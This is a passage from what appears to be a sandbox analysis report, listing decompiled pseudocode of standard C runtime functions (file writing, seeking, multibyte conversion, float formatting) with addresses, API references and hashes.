                                                									_t32 = _t30 | 0xffffffff;
                                                									__eflags = _t32;
                                                									return _t32;
                                                								} else {
                                                									if(_t53[0x11] != 0) {
                                                										L11:
                                                										if(_t48 <= 0) {
                                                											L17:
                                                											return _t53[0x19];
                                                										} else {
                                                											while(1) {
                                                												_t39 = 0x4000;
                                                												if(_t48 < 0x4000) {
                                                													_t39 = _t48;
                                                												}
                                                												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                                                												_t55 = _t55 + 0xc;
                                                												if(_t30 == 0) {
                                                													goto L39;
                                                												}
                                                												_t48 = _t48 - _t30;
                                                												if(_t48 > 0) {
                                                													continue;
                                                												} else {
                                                													goto L17;
                                                												}
                                                												goto L41;
                                                											}
                                                											goto L39;
                                                										}
                                                									} else {
                                                										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                										_t57 = _t55 + 4;
                                                										_t53[0x11] = _t30;
                                                										if(_t30 == 0) {
                                                											goto L39;
                                                										} else {
                                                											E0040BA30(_t48, _t30, 0, 0x4000);
                                                											_t55 = _t57 + 0xc;
                                                											goto L11;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				L41:
                                                			}



















                                                0x00405d00
                                                0x00405d00
                                                0x00405d00
                                                0x00405d01
                                                0x00405d07
                                                0x00405e7f
                                                0x00405e7f
                                                0x00405e7f
                                                0x00405e83
                                                0x00405d0d
                                                0x00405d0d
                                                0x00405d14
                                                0x00000000
                                                0x00405d1a
                                                0x00405d1a
                                                0x00405d20
                                                0x00000000
                                                0x00405d2f
                                                0x00405d34
                                                0x00405d38
                                                0x00405dad
                                                0x00405db0
                                                0x00405db2
                                                0x00405db2
                                                0x00405db2
                                                0x00405db5
                                                0x00405db7
                                                0x00000000
                                                0x00405dbd
                                                0x00405dbd
                                                0x00405dc1
                                                0x00405df8
                                                0x00405dfb
                                                0x00405dfd
                                                0x00405e04
                                                0x00405e09
                                                0x00405e0c
                                                0x00405e0e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405dff
                                                0x00405dff
                                                0x00405e10
                                                0x00405e10
                                                0x00405e12
                                                0x00405e73
                                                0x00405e78
                                                0x00405e14
                                                0x00405e14
                                                0x00405e18
                                                0x00405e2e
                                                0x00405e2e
                                                0x00405e32
                                                0x00405e34
                                                0x00405e37
                                                0x00405e38
                                                0x00405e3c
                                                0x00405e43
                                                0x00405e45
                                                0x00405e45
                                                0x00405e43
                                                0x00405e4c
                                                0x00405e4e
                                                0x00000000
                                                0x00405e50
                                                0x00405e50
                                                0x00405e50
                                                0x00405e55
                                                0x00405e57
                                                0x00405e59
                                                0x00405e59
                                                0x00405e61
                                                0x00405e66
                                                0x00405e69
                                                0x00405e6b
                                                0x00000000
                                                0x00000000
                                                0x00405e6d
                                                0x00405e6f
                                                0x00405e71
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405e71
                                                0x00000000
                                                0x00405e50
                                                0x00405e1a
                                                0x00405e1f
                                                0x00405e24
                                                0x00405e27
                                                0x00405e2a
                                                0x00405e2c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405e2c
                                                0x00405e18
                                                0x00405e12
                                                0x00405dc3
                                                0x00405dc9
                                                0x00405dcb
                                                0x00405dcc
                                                0x00405dcd
                                                0x00405dd4
                                                0x00405ddb
                                                0x00405ddd
                                                0x00405de5
                                                0x00405de7
                                                0x00000000
                                                0x00405ded
                                                0x00405ded
                                                0x00405df0
                                                0x00405df7
                                                0x00405df7
                                                0x00405de7
                                                0x00405dc1
                                                0x00405d3a
                                                0x00405d3c
                                                0x00405d3e
                                                0x00405d3e
                                                0x00405d43
                                                0x00405e79
                                                0x00405e7a
                                                0x00405e7a
                                                0x00405e7e
                                                0x00405d49
                                                0x00405d4d
                                                0x00405d77
                                                0x00405d79
                                                0x00405da7
                                                0x00405dac
                                                0x00405d7b
                                                0x00405d80
                                                0x00405d80
                                                0x00405d87
                                                0x00405d89
                                                0x00405d89
                                                0x00405d91
                                                0x00405d96
                                                0x00405d9b
                                                0x00000000
                                                0x00000000
                                                0x00405da1
                                                0x00405da5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405da5
                                                0x00000000
                                                0x00405d80
                                                0x00405d4f
                                                0x00405d54
                                                0x00405d59
                                                0x00405d5c
                                                0x00405d61
                                                0x00000000
                                                0x00405d67
                                                0x00405d6f
                                                0x00405d74
                                                0x00000000
                                                0x00405d74
                                                0x00405d61
                                                0x00405d4d
                                                0x00405d43
                                                0x00405d38
                                                0x00405d20
                                                0x00405d14
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _fseek_malloc_memset
                                                • String ID:
                                                • API String ID: 208892515-0
                                                • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t59;
                                                				intOrPtr* _t61;
                                                				signed int _t63;
                                                				void* _t68;
                                                				signed int _t69;
                                                				signed int _t72;
                                                				signed int _t74;
                                                				signed int _t75;
                                                				signed int _t77;
                                                				signed int _t78;
                                                				signed int _t81;
                                                				signed int _t82;
                                                				signed int _t84;
                                                				signed int _t88;
                                                				signed int _t97;
                                                				signed int _t98;
                                                				signed int _t99;
                                                				intOrPtr* _t100;
                                                				void* _t101;
                                                
                                                				_t90 = __edx;
                                                				if(_a8 == 0 || _a12 == 0) {
                                                					L4:
                                                					return 0;
                                                				} else {
                                                					_t100 = _a16;
                                                					_t105 = _t100;
                                                					if(_t100 != 0) {
                                                						_t82 = _a4;
                                                						__eflags = _t82;
                                                						if(__eflags == 0) {
                                                							goto L3;
                                                						}
                                                						_t63 = _t59 | 0xffffffff;
                                                						_t90 = _t63 % _a8;
                                                						__eflags = _a12 - _t63 / _a8;
                                                						if(__eflags > 0) {
                                                							goto L3;
                                                						}
                                                						_t97 = _a8 * _a12;
                                                						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                						_v8 = _t82;
                                                						_v16 = _t97;
                                                						_t81 = _t97;
                                                						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                							_v12 = 0x1000;
                                                						} else {
                                                							_v12 =  *(_t100 + 0x18);
                                                						}
                                                						__eflags = _t97;
                                                						if(_t97 == 0) {
                                                							L32:
                                                							return _a12;
                                                						} else {
                                                							do {
                                                								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                								__eflags = _t84;
                                                								if(_t84 == 0) {
                                                									L18:
                                                									__eflags = _t81 - _v12;
                                                									if(_t81 < _v12) {
                                                										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                                                										__eflags = _t68 - 0xffffffff;
                                                										if(_t68 == 0xffffffff) {
                                                											L34:
                                                											_t69 = _t97;
                                                											L35:
                                                											return (_t69 - _t81) / _a8;
                                                										}
                                                										_v8 = _v8 + 1;
                                                										_t72 =  *(_t100 + 0x18);
                                                										_t81 = _t81 - 1;
                                                										_v12 = _t72;
                                                										__eflags = _t72;
                                                										if(_t72 <= 0) {
                                                											_v12 = 1;
                                                										}
                                                										goto L31;
                                                									}
                                                									__eflags = _t84;
                                                									if(_t84 == 0) {
                                                										L21:
                                                										__eflags = _v12;
                                                										_t98 = _t81;
                                                										if(_v12 != 0) {
                                                											_t75 = _t81;
                                                											_t90 = _t75 % _v12;
                                                											_t98 = _t98 - _t75 % _v12;
                                                											__eflags = _t98;
                                                										}
                                                										_push(_t98);
                                                										_push(_v8);
                                                										_push(E0040FA20(_t90, _t98, _t100));
                                                										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                                                										_t101 = _t101 + 0xc;
                                                										__eflags = _t74 - 0xffffffff;
                                                										if(_t74 == 0xffffffff) {
                                                											L36:
                                                											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                											_t69 = _v16;
                                                											goto L35;
                                                										} else {
                                                											_t88 = _t98;
                                                											__eflags = _t74 - _t98;
                                                											if(_t74 <= _t98) {
                                                												_t88 = _t74;
                                                											}
                                                											_v8 = _v8 + _t88;
                                                											_t81 = _t81 - _t88;
                                                											__eflags = _t74 - _t98;
                                                											if(_t74 < _t98) {
                                                												goto L36;
                                                											} else {
                                                												L27:
                                                												_t97 = _v16;
                                                												goto L31;
                                                											}
                                                										}
                                                									}
                                                									_t77 = E0040C1FB(_t100);
                                                									__eflags = _t77;
                                                									if(_t77 != 0) {
                                                										goto L34;
                                                									}
                                                									goto L21;
                                                								}
                                                								_t78 =  *(_t100 + 4);
                                                								__eflags = _t78;
                                                								if(__eflags == 0) {
                                                									goto L18;
                                                								}
                                                								if(__eflags < 0) {
                                                									_t48 = _t100 + 0xc;
                                                									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                									__eflags =  *_t48;
                                                									goto L34;
                                                								}
                                                								_t99 = _t81;
                                                								__eflags = _t81 - _t78;
                                                								if(_t81 >= _t78) {
                                                									_t99 = _t78;
                                                								}
                                                								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                								 *_t100 =  *_t100 + _t99;
                                                								_t101 = _t101 + 0xc;
                                                								_t81 = _t81 - _t99;
                                                								_v8 = _v8 + _t99;
                                                								goto L27;
                                                								L31:
                                                								__eflags = _t81;
                                                							} while (_t81 != 0);
                                                							goto L32;
                                                						}
                                                					}
                                                					L3:
                                                					_t61 = E0040BFC1(_t105);
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					 *_t61 = 0x16;
                                                					E0040E744(_t90, 0, _t100);
                                                					goto L4;
                                                				}
                                                			}





























                                                0x0040baaa
                                                0x0040baba
                                                0x0040bae0
                                                0x00000000
                                                0x0040bac1
                                                0x0040bac1
                                                0x0040bac4
                                                0x0040bac6
                                                0x0040bae7
                                                0x0040baea
                                                0x0040baec
                                                0x00000000
                                                0x00000000
                                                0x0040baee
                                                0x0040baf3
                                                0x0040baf6
                                                0x0040baf9
                                                0x00000000
                                                0x00000000
                                                0x0040bafe
                                                0x0040bb02
                                                0x0040bb09
                                                0x0040bb0c
                                                0x0040bb0f
                                                0x0040bb11
                                                0x0040bb1b
                                                0x0040bb13
                                                0x0040bb16
                                                0x0040bb16
                                                0x0040bb22
                                                0x0040bb24
                                                0x0040bbe9
                                                0x00000000
                                                0x0040bb2a
                                                0x0040bb2a
                                                0x0040bb2d
                                                0x0040bb2d
                                                0x0040bb33
                                                0x0040bb64
                                                0x0040bb64
                                                0x0040bb67
                                                0x0040bbc0
                                                0x0040bbc7
                                                0x0040bbca
                                                0x0040bbf5
                                                0x0040bbf5
                                                0x0040bbf7
                                                0x00000000
                                                0x0040bbfb
                                                0x0040bbcc
                                                0x0040bbcf
                                                0x0040bbd2
                                                0x0040bbd3
                                                0x0040bbd6
                                                0x0040bbd8
                                                0x0040bbda
                                                0x0040bbda
                                                0x00000000
                                                0x0040bbd8
                                                0x0040bb69
                                                0x0040bb6b
                                                0x0040bb78
                                                0x0040bb78
                                                0x0040bb7c
                                                0x0040bb7e
                                                0x0040bb82
                                                0x0040bb84
                                                0x0040bb87
                                                0x0040bb87
                                                0x0040bb87
                                                0x0040bb89
                                                0x0040bb8a
                                                0x0040bb94
                                                0x0040bb95
                                                0x0040bb9a
                                                0x0040bb9d
                                                0x0040bba0
                                                0x0040bc03
                                                0x0040bc03
                                                0x0040bc07
                                                0x00000000
                                                0x0040bba2
                                                0x0040bba2
                                                0x0040bba4
                                                0x0040bba6
                                                0x0040bba8
                                                0x0040bba8
                                                0x0040bbaa
                                                0x0040bbad
                                                0x0040bbaf
                                                0x0040bbb1
                                                0x00000000
                                                0x0040bbb3
                                                0x0040bbb3
                                                0x0040bbb3
                                                0x00000000
                                                0x0040bbb3
                                                0x0040bbb1
                                                0x0040bba0
                                                0x0040bb6e
                                                0x0040bb74
                                                0x0040bb76
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040bb76
                                                0x0040bb35
                                                0x0040bb38
                                                0x0040bb3a
                                                0x00000000
                                                0x00000000
                                                0x0040bb3c
                                                0x0040bbf1
                                                0x0040bbf1
                                                0x0040bbf1
                                                0x00000000
                                                0x0040bbf1
                                                0x0040bb42
                                                0x0040bb44
                                                0x0040bb46
                                                0x0040bb48
                                                0x0040bb48
                                                0x0040bb50
                                                0x0040bb55
                                                0x0040bb58
                                                0x0040bb5a
                                                0x0040bb5d
                                                0x0040bb5f
                                                0x00000000
                                                0x0040bbe1
                                                0x0040bbe1
                                                0x0040bbe1
                                                0x00000000
                                                0x0040bb2a
                                                0x0040bb24
                                                0x0040bac8
                                                0x0040bac8
                                                0x0040bacd
                                                0x0040bace
                                                0x0040bacf
                                                0x0040bad0
                                                0x0040bad1
                                                0x0040bad2
                                                0x0040bad8
                                                0x00000000
                                                0x0040badd

                                                APIs
                                                • __flush.LIBCMT ref: 0040BB6E
                                                • __fileno.LIBCMT ref: 0040BB8E
                                                • __locking.LIBCMT ref: 0040BB95
                                                • __flsbuf.LIBCMT ref: 0040BBC0
                                                  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                • String ID:
                                                • API String ID: 3240763771-0
                                                • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				char _v8;
                                                				signed int _v12;
                                                				char _v20;
                                                				char _t43;
                                                				char _t46;
                                                				signed int _t53;
                                                				signed int _t54;
                                                				intOrPtr _t56;
                                                				int _t57;
                                                				int _t58;
                                                				signed short* _t59;
                                                				short* _t60;
                                                				int _t65;
                                                				char* _t72;
                                                
                                                				_t72 = _a8;
                                                				if(_t72 == 0 || _a12 == 0) {
                                                					L5:
                                                					return 0;
                                                				} else {
                                                					if( *_t72 != 0) {
                                                						E0040EC86( &_v20, _a16);
                                                						_t43 = _v20;
                                                						__eflags =  *(_t43 + 0x14);
                                                						if( *(_t43 + 0x14) != 0) {
                                                							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                                                							__eflags = _t46;
                                                							if(_t46 == 0) {
                                                								__eflags = _a4;
                                                								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                								if(__eflags != 0) {
                                                									L10:
                                                									__eflags = _v8;
                                                									if(_v8 != 0) {
                                                										_t53 = _v12;
                                                										_t11 = _t53 + 0x70;
                                                										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                										__eflags =  *_t11;
                                                									}
                                                									return 1;
                                                								}
                                                								L21:
                                                								_t54 = E0040BFC1(__eflags);
                                                								 *_t54 = 0x2a;
                                                								__eflags = _v8;
                                                								if(_v8 != 0) {
                                                									_t54 = _v12;
                                                									_t33 = _t54 + 0x70;
                                                									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                									__eflags =  *_t33;
                                                								}
                                                								return _t54 | 0xffffffff;
                                                							}
                                                							_t56 = _v20;
                                                							_t65 =  *(_t56 + 0xac);
                                                							__eflags = _t65 - 1;
                                                							if(_t65 <= 1) {
                                                								L17:
                                                								__eflags = _a12 -  *(_t56 + 0xac);
                                                								if(__eflags < 0) {
                                                									goto L21;
                                                								}
                                                								__eflags = _t72[1];
                                                								if(__eflags == 0) {
                                                									goto L21;
                                                								}
                                                								L19:
                                                								_t57 =  *(_t56 + 0xac);
                                                								__eflags = _v8;
                                                								if(_v8 == 0) {
                                                									return _t57;
                                                								}
                                                								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                								return _t57;
                                                							}
                                                							__eflags = _a12 - _t65;
                                                							if(_a12 < _t65) {
                                                								goto L17;
                                                							}
                                                							__eflags = _a4;
                                                							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                							__eflags = _t58;
                                                							_t56 = _v20;
                                                							if(_t58 != 0) {
                                                								goto L19;
                                                							}
                                                							goto L17;
                                                						}
                                                						_t59 = _a4;
                                                						__eflags = _t59;
                                                						if(_t59 != 0) {
                                                							 *_t59 =  *_t72 & 0x000000ff;
                                                						}
                                                						goto L10;
                                                					} else {
                                                						_t60 = _a4;
                                                						if(_t60 != 0) {
                                                							 *_t60 = 0;
                                                						}
                                                						goto L5;
                                                					}
                                                				}
                                                			}

















                                                0x004152a9
                                                0x004152b0
                                                0x004152c7
                                                0x00000000
                                                0x004152b7
                                                0x004152b9
                                                0x004152d3
                                                0x004152d8
                                                0x004152db
                                                0x004152de
                                                0x00415307
                                                0x0041530e
                                                0x00415310
                                                0x00415391
                                                0x004153ac
                                                0x004153ae
                                                0x004152ee
                                                0x004152ee
                                                0x004152f1
                                                0x004152f3
                                                0x004152f6
                                                0x004152f6
                                                0x004152f6
                                                0x004152f6
                                                0x00000000
                                                0x004152fc
                                                0x00415370
                                                0x00415370
                                                0x00415375
                                                0x0041537b
                                                0x0041537e
                                                0x00415380
                                                0x00415383
                                                0x00415383
                                                0x00415383
                                                0x00415383
                                                0x00000000
                                                0x00415387
                                                0x00415312
                                                0x00415315
                                                0x0041531b
                                                0x0041531e
                                                0x00415345
                                                0x00415348
                                                0x0041534e
                                                0x00000000
                                                0x00000000
                                                0x00415350
                                                0x00415353
                                                0x00000000
                                                0x00000000
                                                0x00415355
                                                0x00415355
                                                0x0041535b
                                                0x0041535e
                                                0x004152cc
                                                0x004152cc
                                                0x00415367
                                                0x00000000
                                                0x00415367
                                                0x00415320
                                                0x00415323
                                                0x00000000
                                                0x00000000
                                                0x00415327
                                                0x00415338
                                                0x0041533e
                                                0x00415340
                                                0x00415343
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00415343
                                                0x004152e0
                                                0x004152e3
                                                0x004152e5
                                                0x004152eb
                                                0x004152eb
                                                0x00000000
                                                0x004152bb
                                                0x004152bb
                                                0x004152c0
                                                0x004152c4
                                                0x004152c4
                                                0x00000000
                                                0x004152c0
                                                0x004152b9

                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                • __isleadbyte_l.LIBCMT ref: 00415307
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                				intOrPtr _t25;
                                                				void* _t26;
                                                				void* _t28;
                                                
                                                				_t25 = _a16;
                                                				if(_t25 == 0x65 || _t25 == 0x45) {
                                                					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                					goto L9;
                                                				} else {
                                                					_t34 = _t25 - 0x66;
                                                					if(_t25 != 0x66) {
                                                						__eflags = _t25 - 0x61;
                                                						if(_t25 == 0x61) {
                                                							L7:
                                                							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                						} else {
                                                							__eflags = _t25 - 0x41;
                                                							if(__eflags == 0) {
                                                								goto L7;
                                                							} else {
                                                								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                							}
                                                						}
                                                						L9:
                                                						return _t26;
                                                					} else {
                                                						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                					}
                                                				}
                                                			}






                                                0x004134e0
                                                0x004134e6
                                                0x00413559
                                                0x00000000
                                                0x004134ed
                                                0x004134ed
                                                0x004134f0
                                                0x0041350b
                                                0x0041350e
                                                0x0041352e
                                                0x00413540
                                                0x00413510
                                                0x00413510
                                                0x00413513
                                                0x00000000
                                                0x00413515
                                                0x00413527
                                                0x00413527
                                                0x00413513
                                                0x0041355e
                                                0x00413562
                                                0x004134f2
                                                0x0041350a
                                                0x0041350a
                                                0x004134f0

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                • String ID:
                                                • API String ID: 3016257755-0
                                                • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                Uniqueness

                                                Uniqueness Score: -1.00%